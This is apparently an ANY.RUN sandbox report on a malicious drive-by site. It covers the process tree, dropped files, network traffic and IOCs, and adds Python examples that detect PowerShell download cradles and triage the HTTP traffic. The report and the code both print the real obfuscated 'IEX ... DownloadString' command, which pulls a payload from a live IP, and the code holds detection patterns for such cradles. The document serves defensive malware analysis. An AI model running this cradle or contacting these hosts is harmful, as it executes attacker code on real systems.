URL: http://seemesex.world

Full analysis: https://app.any.run/tasks/6ed3b407-889f-4165-bd04-4a9f73b46dee
Verdict: Malicious activity
Analysis date: May 30, 2020, 16:30:38
OS: Windows 10 Professional (build: 16299, 64 bit)
Indicators:
MD5: 3451C5CCAC21B0F1A09D6C59CADDD504
SHA1: 0BC6234D36BC005358BA6C8385716E381722EC24
SHA256: A00BB74C9EDC1DC54DEE348975C5AA1E6C3734864CA39D6DC3CD5825EDC1DB5F
SSDEEP: 3:N1KNAAIA88:CSAC8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Starts Visual C# compiler
      • PowerShell.exe (PID: 800)
  • SUSPICIOUS
    • Connects to server without host name
      • IEXPLORE.EXE (PID: 4168)
    • Executed via COM
      • FlashUtil_ActiveX.exe (PID: 1836)
    • Executes PowerShell scripts
      • IEXPLORE.EXE (PID: 4168)
    • Reads the machine GUID from the registry
      • PowerShell.exe (PID: 800)
      • csc.exe (PID: 200)
  • INFO
    • Reads internet explorer settings
      • IEXPLORE.EXE (PID: 4168)
    • Reads the machine GUID from the registry
      • IEXPLORE.EXE (PID: 4168)
      • iexplore.exe (PID: 3680)
    • Changes internet zones settings
      • iexplore.exe (PID: 3680)
    • Creates files in the user directory
      • FlashUtil_ActiveX.exe (PID: 1836)
    • Reads the software policy settings
      • PowerShell.exe (PID: 800)
    • Reads settings of System Certificates
      • PowerShell.exe (PID: 800)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 91
Monitored processes: 7
Malicious processes: 0
Suspicious processes: 0

Behavior graph

start -> iexplore.exe (3680) -> iexplore.exe (4168) -> powershell.exe (800) -> csc.exe (200) -> cvtres.exe (484)
conhost.exe (3580) hangs off powershell.exe (800); flashutil_activex.exe (1836) is started separately by svchost.exe via COM.
Processes shown in the graph with no specs: flashutil_activex.exe, conhost.exe, csc.exe, cvtres.exe.

Process information

PID 3680  iexplore.exe
  CMD: "C:\Program Files\internet explorer\iexplore.exe" "http://seemesex.world"
  Path: C:\Program Files\internet explorer\iexplore.exe
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Internet Explorer
  Version: 11.00.16299.15 (WinBuild.160101.0800)

PID 4168  IEXPLORE.EXE
  CMD: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3680 CREDAT:9474 /prefetch:2
  Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  Parent process: iexplore.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Internet Explorer
  Version: 11.00.16299.15 (WinBuild.160101.0800)

PID 1836  FlashUtil_ActiveX.exe
  CMD: "C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe" -Embedding
  Path: C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
  Parent process: svchost.exe
  User: admin
  Company: Adobe Systems Incorporated
  Integrity Level: MEDIUM
  Description: Adobe® Flash® Player Utility
  Version: 29,0,0,171

PID 800  PowerShell.exe
  CMD: ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>IEX (New-Object Net.WebClient).DownloadString('http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187');"
  Path: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
  Parent process: IEXPLORE.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Windows PowerShell
  Exit code: 0
  Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 3580  conhost.exe
  CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
  Path: C:\WINDOWS\system32\conhost.exe
  Parent process: PowerShell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Console Window Host
  Exit code: 0
  Version: 10.0.16299.15 (WinBuild.160101.0800)

PID 200  csc.exe
  CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.cmdline"
  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  Parent process: PowerShell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Visual C# Command Line Compiler
  Exit code: 0
  Version: 4.7.2556.0 built by: NET471REL1

PID 484  cvtres.exe
  CMD: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP"
  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  Parent process: csc.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: LOW
  Description: Microsoft® Resource File To COFF Object Conversion Utility
  Exit code: 0
  Version: 12.00.52519.0 built by: VSWINSERVICING
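The PowerShell command line of PID 800 is the pivot of this trace. A low-integrity Internet Explorer content process launched 32-bit PowerShell through a relative path with a `\..\` component (`((((\..\PowerShell.exe`), which defeats naive full-path matching on the image; the command is padded with a `<# ... #>` block comment that PowerShell ignores; and what actually runs is a plain `IEX (New-Object Net.WebClient).DownloadString(...)` download cradle. PowerShell then spawned csc.exe and cvtres.exe, the footprint of compiling C# on the fly (the pattern Add-Type produces), and the resulting 4xjgo02r.dll appears in the dropped files. The Python below is an added example, not part of the ANY.RUN report: it encodes the process table as records and runs three checks over them, parent/child anomalies, comment-stripped cradle detection and the traversal-style launch. The parent PIDs are an assumption inferred from the report's parent-process column (the report prints parent names, not PIDs).

```python
import re

# Constructed from the process table in the report above. Parent PIDs are not printed by the
# report; they are inferred here from its parent-process column (PID 4168 carries SCODEF:3680,
# PowerShell's parent is the upper-case IEXPLORE.EXE 4168, and so on) and are an assumption.
# Parents outside the monitored set (explorer.exe, svchost.exe) are given ppid 0.
PROCESSES = [
    {"pid": 3680, "ppid": 0, "image": "iexplore.exe",
     "cmd": r'''"C:\Program Files\internet explorer\iexplore.exe" "http://seemesex.world"'''},
    {"pid": 4168, "ppid": 3680, "image": "iexplore.exe",
     "cmd": r'''"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3680 CREDAT:9474 /prefetch:2'''},
    {"pid": 1836, "ppid": 0, "image": "flashutil_activex.exe",
     "cmd": r'''"C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe" -Embedding'''},
    {"pid": 800, "ppid": 4168, "image": "powershell.exe",
     "cmd": r'''((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>IEX (New-Object Net.WebClient).DownloadString('http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187');"'''},
    {"pid": 3580, "ppid": 800, "image": "conhost.exe",
     "cmd": r'''\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1'''},
    {"pid": 200, "ppid": 800, "image": "csc.exe",
     "cmd": r'''"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.cmdline"'''},
    {"pid": 484, "ppid": 200, "image": "cvtres.exe",
     "cmd": r'''C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp"'''},
]

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)      # PowerShell block comments, used here as padding
URL = re.compile(r"https?://[^\s'\")]+", re.I)
CRADLE = re.compile(
    r"\b(iex|invoke-expression)\b.*?\b(downloadstring|downloaddata|downloadfile|invoke-webrequest|iwr|invoke-restmethod)\b",
    re.I | re.S)
TRAVERSAL_LAUNCH = re.compile(r"\\\.\.\\\S*powershell\.exe", re.I)   # e.g. ((((\..\PowerShell.exe

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def normalize_powershell(cmd):
    """Drop block comments and collapse whitespace so padding like <#AAAA...#> cannot hide keywords."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT.sub(" ", cmd)).strip()


def extract_urls(cmd):
    """URLs referenced by a command line, after comment stripping."""
    return URL.findall(normalize_powershell(cmd))


def parent_chain(processes, pid):
    """Image names from the given process up to the first parent outside the record set."""
    by_pid = {p["pid"]: p for p in processes}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain


def analyze(processes):
    """Return (pid, rule) findings for the parent/child and command-line checks."""
    by_pid = {p["pid"]: p for p in processes}
    findings = []
    for p in processes:
        parent = by_pid.get(p["ppid"])
        parent_image = parent["image"] if parent else None
        if parent_image in BROWSERS and p["image"] in SCRIPT_HOSTS:
            findings.append((p["pid"], "browser-spawned-script-host"))
        if parent_image == "powershell.exe" and p["image"] == "csc.exe":
            findings.append((p["pid"], "powershell-spawned-csc"))   # on-the-fly C# compile, as Add-Type does
        if p["image"] == "powershell.exe":
            if CRADLE.search(normalize_powershell(p["cmd"])):
                findings.append((p["pid"], "download-cradle"))
            if TRAVERSAL_LAUNCH.search(p["cmd"]):
                findings.append((p["pid"], "relative-path-launch"))
    return findings


if __name__ == "__main__":
    for pid, rule in analyze(PROCESSES):
        print(pid, rule, " <- ".join(parent_chain(PROCESSES, pid)))
    print(extract_urls(PROCESSES[3]["cmd"]))
```

Run against the records above it flags PID 800 three times (browser parent, cradle, traversal launch) and PID 200 once (csc.exe under PowerShell); conhost.exe and cvtres.exe are not flagged, and the extracted URL is the second-stage fetch that shows up in the HTTP table with a 200 and 2.08 Kb of text.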
Total events: 6 416
Read events: 3 302
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 0
Suspicious files: 2
Text files: 8
Unknown types: 0

Dropped files (PID, process, filename, type; hashes where the summary lists them)

800   PowerShell.exe  C:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_xokpeyd5.hui.ps1
800   PowerShell.exe  C:\Users\admin\AppData\Local\Temp\Low\__PSScriptPolicyTest_1yqjz34a.nw4.psm1
      (the __PSScriptPolicyTest_* files are written by PowerShell itself at startup to probe script-execution policy; they are not attacker content)
200   csc.exe         C:\Users\admin\AppData\Local\Temp\Low\CSC4F126634FE8B4F72912FBF2B67C3BA1.TMP
484   cvtres.exe      C:\Users\admin\AppData\Local\Temp\Low\RES2E3E.tmp
200   csc.exe         C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.dll
200   csc.exe         C:\Users\admin\AppData\Local\Temp\Low\4xjgo02r.out
      (the assembly and compiler output built from 4xjgo02r.cmdline, see csc.exe PID 200 above)
3680  iexplore.exe    C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\UrlBlock\URL46D7.tmp
4168  IEXPLORE.EXE    C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\FZ4P8RAN\10105_jokiest_Couldn[1].js  (text)
      MD5: F836C010B14CBA02592A81B59BDC4976
      SHA256: 39078DE84082E083DE45C60334A78513F1ECB25BED11B326E22545591C9C44D6
3680  iexplore.exe    C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZSVOB39W\iecompatviewlist[1].xml  (xml)
      MD5: AD288DEDE9F96BA9BF5928EEBB84F430
      SHA256: 11EE91F9612C0EEC7C2E218DBCC2566549BACED502669054B56DA7837D891D9C
4168  IEXPLORE.EXE    C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\LD57I5PR\pervades_8497_11925[1].htm  (html)
      MD5: 914D2CEEC2AB02A814C0E680545F9F7A
      SHA256: 1F3B1F4B0A6FAFF6063ED8BB82A8FF11D78ED4BBE76EFF237743AE75AC853C86
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 9
TCP/UDP connections: 17
DNS requests: 10
Threats: 0

HTTP requests (PID | process | method | HTTP code | server IP:port | URL | country | type | size | reputation)

4168 | IEXPLORE.EXE   | GET  | 302 | 148.251.72.21:80  | http://seemesex.world/ | DE | - | - | malicious
800  | PowerShell.exe | GET  | -   | 64.227.107.133:80 | http://64.227.107.133/12018-Gaveling/9KSzP?aVVc=2797 | US | - | - | suspicious
3680 | iexplore.exe   | GET  | 404 | 64.227.107.133:80 | http://64.227.107.133/favicon.ico | US | - | - | suspicious
4168 | IEXPLORE.EXE   | GET  | 302 | 94.130.90.228:80  | http://atztds547.xyz/xn94r2398us2938u4s | DE | - | - | suspicious
800  | PowerShell.exe | GET  | 200 | 64.227.107.133:80 | http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187 | US | text | 2.08 Kb | suspicious
4168 | IEXPLORE.EXE   | GET  | 200 | 64.227.107.133:80 | http://64.227.107.133/1966_04_15/Trinkums/pervades_8497_11925 | US | html | 4.90 Kb | suspicious
4168 | IEXPLORE.EXE   | POST | 200 | 64.227.107.133:80 | http://64.227.107.133/computing-Deperm/agkZId | US | text | 9.88 Kb | suspicious
4168 | IEXPLORE.EXE   | GET  | 200 | 64.227.107.133:80 | http://64.227.107.133/795X/10105_jokiest_Couldn?gjMJD=Fumeuse_Ankusha_mislays | US | text | 28.2 Kb | suspicious
4168 | IEXPLORE.EXE   | POST | 200 | 64.227.107.133:80 | http://64.227.107.133/1989-05-27/Demarcate/W0p6/13110_5680?Chaliced=zxHq | US | text | 7.21 Kb | suspicious

Connections (PID | process | IP:port | domain | ASN | country | reputation)

3680 | iexplore.exe   | 152.199.19.161:443 | iecvlist.microsoft.com              | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
4276 | svchost.exe    | 20.191.48.196:443  | settings-win-ppe.data.microsoft.com | Microsoft Corporation     | US | unknown
4168 | IEXPLORE.EXE   | 148.251.72.21:80   | seemesex.world                      | Hetzner Online GmbH       | DE | suspicious
800  | PowerShell.exe | 64.227.107.133:80  | -                                   | Peer 1 Network (USA) Inc. | US | suspicious
4168 | IEXPLORE.EXE   | 64.227.107.133:80  | -                                   | Peer 1 Network (USA) Inc. | US | suspicious
4168 | IEXPLORE.EXE   | 94.130.90.228:80   | atztds547.xyz                       | Hetzner Online GmbH       | DE | malicious
3680 | iexplore.exe   | 13.80.7.77:443     | urs.microsoft.com                   | Microsoft Corporation     | NL | unknown
3680 | iexplore.exe   | 64.227.107.133:80  | -                                   | Peer 1 Network (USA) Inc. | US | suspicious
4168 | IEXPLORE.EXE   | 13.80.7.77:443     | urs.microsoft.com                   | Microsoft Corporation     | NL | unknown

DNS requests (domain | resolved IP | reputation)

seemesex.world                      | 148.251.72.21   | malicious
atztds547.xyz                       | 94.130.90.228   | suspicious
urs.microsoft.com                   | 13.80.7.77      | whitelisted
iecvlist.microsoft.com              | 152.199.19.161  | whitelisted
c.urs.microsoft.com                 | 13.80.7.77      | whitelisted
ieonline.microsoft.com              | 204.79.197.200  | whitelisted
nexusrules.officeapps.live.com      | 52.109.12.18    | whitelisted
self.events.data.microsoft.com      | 52.114.158.91   | whitelisted
settings-win-ppe.data.microsoft.com | 20.191.48.196   | whitelisted
dns.msftncsi.com                    | 131.107.255.255 | shared

Threats (PID | process | class | message)

-    | -            | Potentially Bad Traffic | ET INFO Observed DNS Query to .world TLD
4168 | IEXPLORE.EXE | Potentially Bad Traffic | ET INFO HTTP Request to Suspicious *.world Domain
4168 | IEXPLORE.EXE | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain

4 ETPRO signatures available at the full report
No debug info
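The network side of the report hangs together around three hosts: the landing domain seemesex.world (302), a second-stage domain atztds547.xyz (302), and a bare IP, 64.227.107.133, that serves every 200 response, including the PowerShell cradle's fetch and two POSTs from the IE content process. The Threats section only fires on the .world and .xyz TLDs; the "Connects to server without host name" signature is what covers the IP-literal traffic. The Python below is an added example, not part of the ANY.RUN report, that takes the HTTP table and the INetCache entries from the dropped-files list as constructed records and does the triage an analyst would do by hand: tag each request with the traits the signatures key on, rank servers by request count, and map the cached files back to the URLs that produced them. The TLD list and the browser-name set are the example's own assumptions.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed from the HTTP-requests table of the report above:
# (PID, process, method, HTTP code or None where the report shows none, server IP:port, URL).
HTTP = [
    (4168, "IEXPLORE.EXE", "GET", 302, "148.251.72.21:80", "http://seemesex.world/"),
    (800, "PowerShell.exe", "GET", None, "64.227.107.133:80", "http://64.227.107.133/12018-Gaveling/9KSzP?aVVc=2797"),
    (3680, "iexplore.exe", "GET", 404, "64.227.107.133:80", "http://64.227.107.133/favicon.ico"),
    (4168, "IEXPLORE.EXE", "GET", 302, "94.130.90.228:80", "http://atztds547.xyz/xn94r2398us2938u4s"),
    (800, "PowerShell.exe", "GET", 200, "64.227.107.133:80", "http://64.227.107.133/5953/jSIX?Timbang=UEAL&nG8Xer=9595_Oneill&cfJLd=1187"),
    (4168, "IEXPLORE.EXE", "GET", 200, "64.227.107.133:80", "http://64.227.107.133/1966_04_15/Trinkums/pervades_8497_11925"),
    (4168, "IEXPLORE.EXE", "POST", 200, "64.227.107.133:80", "http://64.227.107.133/computing-Deperm/agkZId"),
    (4168, "IEXPLORE.EXE", "GET", 200, "64.227.107.133:80", "http://64.227.107.133/795X/10105_jokiest_Couldn?gjMJD=Fumeuse_Ankusha_mislays"),
    (4168, "IEXPLORE.EXE", "POST", 200, "64.227.107.133:80", "http://64.227.107.133/1989-05-27/Demarcate/W0p6/13110_5680?Chaliced=zxHq"),
]
# Constructed from the INetCache entries in the dropped-files list of the report above.
CACHE_FILES = [
    r"C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\FZ4P8RAN\10105_jokiest_Couldn[1].js",
    r"C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZSVOB39W\iecompatviewlist[1].xml",
    r"C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Low\IE\LD57I5PR\pervades_8497_11925[1].htm",
]

SUSPICIOUS_TLDS = {"world", "xyz"}   # assumption: the TLDs the ET/AV INFO rules in the Threats section fire on
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}   # assumption: expected HTTP clients
CACHE_NAME = re.compile(r"([^\\]+?)(?:\[\d+\])?\.\w+$")   # <stem>[<n>].<ext>, the IE INetCache naming scheme


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(requests):
    """Tag each request with the traits the report's signatures key on; returns (pid, url, tags)."""
    findings = []
    for pid, proc, method, _code, _ip, url in requests:
        host = urlsplit(url).hostname or ""
        tags = []
        if is_ip_literal(host):
            tags.append("ip-literal-host")          # "Connects to server without host name"
        elif host.rsplit(".", 1)[-1] in SUSPICIOUS_TLDS:
            tags.append("suspicious-tld")           # what the ET INFO rules above alert on
        if proc.lower() not in BROWSERS:
            tags.append("non-browser-client")       # PowerShell talking HTTP
        if method == "POST" and is_ip_literal(host):
            tags.append("post-to-ip-literal")       # upload or beacon to a bare IP
        if tags:
            findings.append((pid, url, tags))
    return findings


def servers_by_request_count(requests):
    """Server IPs ordered by how many requests hit them; the busiest is usually the payload host."""
    counts = Counter(r[4].split(":")[0] for r in requests)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def match_cache_files_to_urls(files, requests):
    """Map IE cache entries back to the URL they came from. IE names the file after the last path
    segment, appends [n] to disambiguate and, when the URL carries no extension, adds one from the
    content type (here .htm and .js), so only the stem is comparable."""
    stems = {}
    for r in requests:
        seg = urlsplit(r[5]).path.rstrip("/").rsplit("/", 1)[-1]
        if seg:
            stems.setdefault(seg.split(".")[0], r[5])
    out = {}
    for f in files:
        m = CACHE_NAME.search(f)
        out[f] = stems.get(m.group(1)) if m else None
    return out


if __name__ == "__main__":
    for pid, url, tags in triage(HTTP):
        print(pid, ",".join(tags), url)
    print(servers_by_request_count(HTTP))
    for f, url in match_cache_files_to_urls(CACHE_FILES, HTTP).items():
        print(f.rsplit("\\", 1)[-1], "<-", url)
```

Two of the three cached files map straight back to the 200 responses from 64.227.107.133 (the 28.2 Kb script and the 4.90 Kb page), which is where to start when pulling content out of the PCAP; iecompatviewlist[1].xml has no matching request in the table because it came over the whitelisted TLS session to iecvlist.microsoft.com and is noise.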